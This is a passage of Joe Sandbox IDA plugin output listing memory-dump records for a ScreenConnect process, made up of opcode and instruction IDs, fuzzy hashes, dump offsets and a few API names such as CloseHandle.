                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: nCvq
                                                                                                                          • API String ID: 0-3590779759
                                                                                                                          • Opcode ID: 9edbbad92405a8a8e80037c728be15d0c1a5a6ebe74ac367d7caed702f94df31
                                                                                                                          • Instruction ID: 95884e8637615197a0f6161166663bedff65a6ecedb78ad0e2ebefa16def55b8
                                                                                                                          • Opcode Fuzzy Hash: 9edbbad92405a8a8e80037c728be15d0c1a5a6ebe74ac367d7caed702f94df31
                                                                                                                          • Instruction Fuzzy Hash: 8751A370B002028FDB14EB79D85469E77E6FF88351B108568E506EB365EF31ED46CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: c802fe53ee2d3189348df580809141d2c76bd49d6c037135719f3d4700c17d9b
                                                                                                                          • Instruction ID: c321eeff1e02e9aa185811b1c3991ba05c10df5ee79f2936d296df74dcea48f1
                                                                                                                          • Opcode Fuzzy Hash: c802fe53ee2d3189348df580809141d2c76bd49d6c037135719f3d4700c17d9b
                                                                                                                          • Instruction Fuzzy Hash: C341C031A00216CBCB15EF69D4949ADBBAAFFC4315F14C629E9069B346DB31ED06CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LR^q
                                                                                                                          • API String ID: 0-2625958711
                                                                                                                          • Opcode ID: da224cc8e2a85e05663066739f560a5f9d20f8786d6984f80c48d9c57d727b3d
                                                                                                                          • Instruction ID: 2bae50d13e38416effc247e4758a23a39fa12f3a66ba81871a39783fe163fcca
                                                                                                                          • Opcode Fuzzy Hash: da224cc8e2a85e05663066739f560a5f9d20f8786d6984f80c48d9c57d727b3d
                                                                                                                          • Instruction Fuzzy Hash: 5D413E30E10615DBDF299F75D868AAEBBB6BF98705F104029E402B7294DF759941CF80
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 0-1334834377
                                                                                                                          • Opcode ID: e949f42ed2a6b3c20954c995b2cbd84474d06e077b6e161d9fbc59c921c068a4
                                                                                                                          • Instruction ID: d2b152bd0f5b7ace132f392a5d171f904b23d5d5be78d890bf94de8ec74d2876
                                                                                                                          • Opcode Fuzzy Hash: e949f42ed2a6b3c20954c995b2cbd84474d06e077b6e161d9fbc59c921c068a4
                                                                                                                          • Instruction Fuzzy Hash: FC312575B00211ABC705AB7C989055E7BE6FF883513008928D519DB344EF70AE0A8BE2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 0-1334834377
                                                                                                                          • Opcode ID: b4ad7cd0d145e3713e12334b601af4a7d671722df3cd2ba64353d31757cc043b
                                                                                                                          • Instruction ID: c4fda6938dbfe36ce11027350765872a9d667f2fd0d793a36835bc2267b2a40b
                                                                                                                          • Opcode Fuzzy Hash: b4ad7cd0d145e3713e12334b601af4a7d671722df3cd2ba64353d31757cc043b
                                                                                                                          • Instruction Fuzzy Hash: C131D475B006119B8705AB7DD89055E77E6FFC83513008928E919EB344EF70FD498BE2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LR^q
                                                                                                                          • API String ID: 0-2625958711
                                                                                                                          • Opcode ID: 542f6c5329112eaf68fbcf831b20310d78b378f964b49c7d7593d39fb4a3c476
                                                                                                                          • Instruction ID: 85162e5a0122f2c8e00b2773dca11a65803b95f2f53248ec167e996d2df50492
                                                                                                                          • Opcode Fuzzy Hash: 542f6c5329112eaf68fbcf831b20310d78b378f964b49c7d7593d39fb4a3c476
                                                                                                                          • Instruction Fuzzy Hash: 5421B536B01204ABDB18DE79C859BAEBB7ABBC8700F14442CE401E7281FE719C41CB69
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: 7ea5b3cbd616b35579aee483e3eb49d6446fba7638c205db8dab6f3336c72a82
                                                                                                                          • Instruction ID: fcde2e3694bd3f12389cc6bb3882d041056aeb458af09eb4ff9ed83dd204e048
                                                                                                                          • Opcode Fuzzy Hash: 7ea5b3cbd616b35579aee483e3eb49d6446fba7638c205db8dab6f3336c72a82
                                                                                                                          • Instruction Fuzzy Hash: 5D1155B5800349CFCB20DF99C889BDEBBF4EB48324F208419D928A3340D338A945CFA5
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: f96f77412a1f20d8cf6e6b0aafdfeb928019e3bcd97ba64844c7ca4561063101
                                                                                                                          • Instruction ID: d43272a9a139fd9a306f8699f7aa673d339f57c59379dd9c94fc9110cfa7b06b
                                                                                                                          • Opcode Fuzzy Hash: f96f77412a1f20d8cf6e6b0aafdfeb928019e3bcd97ba64844c7ca4561063101
                                                                                                                          • Instruction Fuzzy Hash: 6F1136B5800349CFCB20DF99C849BDEBBF4EB48324F208459D569A7341D739A945CFA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $^q
                                                                                                                          • API String ID: 0-388095546
                                                                                                                          • Opcode ID: eec312f3747f4b8c70bc6818f4a7f6e4da737055e5abe7ce18ea85e4a5332af5
                                                                                                                          • Instruction ID: a33c6d01812e4d70cf9b903e17821fe224d39854db7cbd13e29fc66471517920
                                                                                                                          • Opcode Fuzzy Hash: eec312f3747f4b8c70bc6818f4a7f6e4da737055e5abe7ce18ea85e4a5332af5
                                                                                                                          • Instruction Fuzzy Hash: 0FE08630A46700CFD725CF28D6515123BF8AF1595134545EFD949CB672C736D802C621
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ed5a8d4eeab964a77d8d6faea1aca86377199b5f1e7b5df09a89c2db4a0166b
                                                                                                                          • Instruction ID: 6c204a3beb67c9d52013d9eb0baab45c8af3110fe3e1140e826b6f4a53dc933e
                                                                                                                          • Opcode Fuzzy Hash: 4ed5a8d4eeab964a77d8d6faea1aca86377199b5f1e7b5df09a89c2db4a0166b
                                                                                                                          • Instruction Fuzzy Hash: C7A11574B00615CFDB14DFA9C594AADBBF6EF88300B108558E446AB365EB72ED41CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 75ec26d11315941d8e9f70aca7f0d122c8b3225338bb1a3c94f56ae7b45c2209
                                                                                                                          • Instruction ID: 6926e1b6f5aa3169e2a207c17c6a43684e583eb8d5fbc3d7eb47156ef64ee6ef
                                                                                                                          • Opcode Fuzzy Hash: 75ec26d11315941d8e9f70aca7f0d122c8b3225338bb1a3c94f56ae7b45c2209
                                                                                                                          • Instruction Fuzzy Hash: 2B911574B00615CFDB14DFA8C594A9DBBF6EF88300B108598E846AB365EB32ED41CF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d942fe736e6d6d007a93a40df7311abba8924d54335737869c8d4b4724a3daf0
                                                                                                                          • Instruction ID: 14153eea2013412a695662ae30fb39fc9f13a43c441590cf4bd8b41d30b94873
                                                                                                                          • Opcode Fuzzy Hash: d942fe736e6d6d007a93a40df7311abba8924d54335737869c8d4b4724a3daf0
                                                                                                                          • Instruction Fuzzy Hash: 92517D79B002019FDB14DF7DC89496ABBE6EF993047108568E54ACF326EB31EC068B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f5d52bd7d5da2d53dd6e8c90b9cc82601e14074621aa962fee27e95eb7195cc7
                                                                                                                          • Instruction ID: f8964d637b7162b07de53ee171043b136bf74972b94d9fd91eb83db522f3d37f
                                                                                                                          • Opcode Fuzzy Hash: f5d52bd7d5da2d53dd6e8c90b9cc82601e14074621aa962fee27e95eb7195cc7
                                                                                                                          • Instruction Fuzzy Hash: D0516E79B002059FDB14DF7DC89496AB7EAEF983047108568E54ADF316EB31EC068F91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e76164012ed7569d239ec5d535af9c983d82c95ddb8dfc569d77c36674306aea
                                                                                                                          • Instruction ID: 7b40631d12ad3760b99fc7e4fec6d31b90e31a7ad9e6b230d607964b627a6f98
                                                                                                                          • Opcode Fuzzy Hash: e76164012ed7569d239ec5d535af9c983d82c95ddb8dfc569d77c36674306aea
                                                                                                                          • Instruction Fuzzy Hash: 1E51E470600B01CFD724CF2AD494966B7F6FF89365B248A5CE49A9B7A4DB32EC41CB44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 58a5f730919000086f6f7e6310d26ee7119057001eccac9eec1c675d29056f4e
                                                                                                                          • Instruction ID: af96b99ab726e5f07ce3331a9db75b72c6b167b5514468a618ece95ae8bb6db5
                                                                                                                          • Opcode Fuzzy Hash: 58a5f730919000086f6f7e6310d26ee7119057001eccac9eec1c675d29056f4e
                                                                                                                          • Instruction Fuzzy Hash: 62517774E103199FDB05EFB8D844B9DBBB1FF88300F108559E518AB254EB75AA85CFA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f143d0a7eb083eeae8f7bf53eaceb5c43e4c1eb50b591fcb807caf99064cba07
                                                                                                                          • Instruction ID: 2d13dd8870f7ac0ea02ab7a94aa3d69f06fb5012fd7c4a93073ddfa01496e7c9
                                                                                                                          • Opcode Fuzzy Hash: f143d0a7eb083eeae8f7bf53eaceb5c43e4c1eb50b591fcb807caf99064cba07
                                                                                                                          • Instruction Fuzzy Hash: C3515A74E103199FDB04DFA8D884B9DBBB2FF98300F108559E518AB254EB75A985CF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: af642095791fa60c2f6dc98d6da3cf8ebd4c855e80825ce3d33d6f21e17a2268
                                                                                                                          • Instruction ID: eb4df7bf4349deafe133336a98fede5b48e094417a6bebf1e534bdbd5eb4c625
                                                                                                                          • Opcode Fuzzy Hash: af642095791fa60c2f6dc98d6da3cf8ebd4c855e80825ce3d33d6f21e17a2268
                                                                                                                          • Instruction Fuzzy Hash: C0418131E0020ADBDB15DFA8D890ADEBBB6FF89740F248129E505B7340DB71AD46CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2af555810119000282452896e116dfaa0572707181e819ecc7314535eb1c5b4
                                                                                                                          • Instruction ID: 469e34d74c1566687e3eeafaf9212b5435927dbae1c2837991e8e5fe69dafd59
                                                                                                                          • Opcode Fuzzy Hash: b2af555810119000282452896e116dfaa0572707181e819ecc7314535eb1c5b4
                                                                                                                          • Instruction Fuzzy Hash: 2D41BC31A002019FCB14DF38D894AAD7BF6FF89214F1485A8E806DB3A1DF75AD06CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 41ad4431572d71a1435f4677ba507af9dcead434926f1b78e72cc31de38cd22e
                                                                                                                          • Instruction ID: 71236db8cffb986d49305b4621128d97410aad6836b5bf05ee44a7fb7b577a8d
                                                                                                                          • Opcode Fuzzy Hash: 41ad4431572d71a1435f4677ba507af9dcead434926f1b78e72cc31de38cd22e
                                                                                                                          • Instruction Fuzzy Hash: 7A415B30B102119FCB14DF79D894AAEBBF6FF88614B104569E806EB3A0DF71AD05CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 638ec4fdc3b9499437ef1fd9a7d43f01db91dc90ea486cbbed0cfdc05467cdfc
                                                                                                                          • Instruction ID: 85d83bdd3af4339ad2d5a8839b6283aa9662ee846327d316926748f42bb02575
                                                                                                                          • Opcode Fuzzy Hash: 638ec4fdc3b9499437ef1fd9a7d43f01db91dc90ea486cbbed0cfdc05467cdfc
                                                                                                                          • Instruction Fuzzy Hash: 43317231B012058FEB149FAAC4546BEF7FAEF89358F148469E406EB754DB71ED048B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 84db475e95a3224939c3beb609e00c538c352ff55d2a6ced3d2f1a7c31af8b2e
                                                                                                                          • Instruction ID: 5221cd9c7177244f28ea935c8c97abe9220b30aa53917ff584472f8940da6937
                                                                                                                          • Opcode Fuzzy Hash: 84db475e95a3224939c3beb609e00c538c352ff55d2a6ced3d2f1a7c31af8b2e
                                                                                                                          • Instruction Fuzzy Hash: 413134F2A04A15CFCB109F78D9942DEBBE4FF56324B148265C51E87286EB369903CF41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: acdb29c6eae31fb83a7137c003a15af56d04e8e4dd40c93ca12763111b6c1b9b
                                                                                                                          • Instruction ID: ccbc0ef8801b9ff1deae18c0a60eed2dbedb06e22848b3fbbc7cec0f4da44ead
                                                                                                                          • Opcode Fuzzy Hash: acdb29c6eae31fb83a7137c003a15af56d04e8e4dd40c93ca12763111b6c1b9b
                                                                                                                          • Instruction Fuzzy Hash: D0317CB1D003099FCB14DFA9D8446DEFFF5EF88320F10846AD519A7240D779A9468FA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d0f5b9dede82ab8b496d4d77f0fff6bbb37044c7780248cfaf959f959d50045
                                                                                                                          • Instruction ID: 8bf29abce6bba2a5c30d85ccff7ebc3d86e61b9e2d984072fd4a29638756c9a1
                                                                                                                          • Opcode Fuzzy Hash: 1d0f5b9dede82ab8b496d4d77f0fff6bbb37044c7780248cfaf959f959d50045
                                                                                                                          • Instruction Fuzzy Hash: 40315C7690025ADFCF00DFACE8804DDBBB1FF89324B15856AD505BB211D731BA0ACBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2fe9a8e4b6f70204a99c094d5fc716f14f6fdeb7fb6cd2ffa0a54e053a81a084
                                                                                                                          • Instruction ID: 7f65c16db2ee5e29fcbbedf17007482ca78b7107e7492bbcf9780bbeb8cbf433
                                                                                                                          • Opcode Fuzzy Hash: 2fe9a8e4b6f70204a99c094d5fc716f14f6fdeb7fb6cd2ffa0a54e053a81a084
                                                                                                                          • Instruction Fuzzy Hash: 45311C70A00701CFD730DF2AD85496ABBF5EF89325B144A28D456DB7A5DB32E946CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6f6cfabb29281121c055ee12aa90e2db9209d9b19df64de904326b1a0e6ea599
                                                                                                                          • Instruction ID: bb4b636478c364bdcf5c9a92d1fb5e57e0e1e15a820e787d8db36f88b2f8b121
                                                                                                                          • Opcode Fuzzy Hash: 6f6cfabb29281121c055ee12aa90e2db9209d9b19df64de904326b1a0e6ea599
                                                                                                                          • Instruction Fuzzy Hash: C1312575A04215DFCB04EFB8E95809EBBB5FF49310B0040A6D919D7345EB319E05CFA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fe75ccd436a3b4c65d435b87239803909682817758761f1da61ded1a34f763f3
                                                                                                                          • Instruction ID: 1f09eb06759a69fdbf4ef7c4a32f819e03bc44589b1b853c65bb83786a7d7786
                                                                                                                          • Opcode Fuzzy Hash: fe75ccd436a3b4c65d435b87239803909682817758761f1da61ded1a34f763f3
                                                                                                                          • Instruction Fuzzy Hash: C5313A70A00B05CFC730DF6ED84465ABBF5EF89325F104A18D0969B6A5D771E946CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cd8f18ac723c34ef6df2e6b2060f5fb17dbc39f3f8ff588aee76d7300330a0f5
                                                                                                                          • Instruction ID: 1d4dae9a58caddfa17292fa2285a73625754e0908c632fe7b8f55d8e6606519f
                                                                                                                          • Opcode Fuzzy Hash: cd8f18ac723c34ef6df2e6b2060f5fb17dbc39f3f8ff588aee76d7300330a0f5
                                                                                                                          • Instruction Fuzzy Hash: D4313A70A00B05CFCB30DF69C84465ABBF5EF89325F144B18D0969B6A5D771E946CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6eb0196643c5adbfb484347dd93742dae1808a053831fa294f73d43229e75a9b
                                                                                                                          • Instruction ID: 383ed301e89ee86b6026208283ab4cd3d16b22e944a53e85519885696cbc888f
                                                                                                                          • Opcode Fuzzy Hash: 6eb0196643c5adbfb484347dd93742dae1808a053831fa294f73d43229e75a9b
                                                                                                                          • Instruction Fuzzy Hash: 22314730A00701CFD730CF29C88896AB7F5FF89314B244A2CD49ADB2A1D771E945CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c3523becc540128c7d6173707e454ed1a1125094524026e306e76e66f30c635b
                                                                                                                          • Instruction ID: cefad228739ccac21a1f315644f12b07962ea0357d4903b22be4f536035eea52
                                                                                                                          • Opcode Fuzzy Hash: c3523becc540128c7d6173707e454ed1a1125094524026e306e76e66f30c635b
                                                                                                                          • Instruction Fuzzy Hash: 2C310670B00701CFD730DF6AC84466ABBF5AFA9315B108A28D5A69B7A5D731E946CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4f6f48efe9c041009373a928dbec1912435bf59ef844727d088dc9ddb348f35f
                                                                                                                          • Instruction ID: 4eb2bdc542fa899eb428cd006114cc9c6004378afe9d27ba7e47ad47a8fbbc16
                                                                                                                          • Opcode Fuzzy Hash: 4f6f48efe9c041009373a928dbec1912435bf59ef844727d088dc9ddb348f35f
                                                                                                                          • Instruction Fuzzy Hash: 2A21BF7290025A9BDB05DFACD8804DDBFB2FF85354B48C529D109BB215DB32A94BCB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 50e858ff90ecd2c5c067ea0dd588d143f6599f83ab5e1c1c64034a146c5f129f
                                                                                                                          • Instruction ID: 76308941ad14eee33472fef4b1457a66369412d1a307d6a3d7e4552d162055fe
                                                                                                                          • Opcode Fuzzy Hash: 50e858ff90ecd2c5c067ea0dd588d143f6599f83ab5e1c1c64034a146c5f129f
                                                                                                                          • Instruction Fuzzy Hash: 88213375504244EFCB05DF58D9C4BA6BFA5FB98328F20C668E80A8B346C336D516CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f8f2b6bb2a30711554d66230463c310659f1010e86006f5f85b5eb034cc98c93
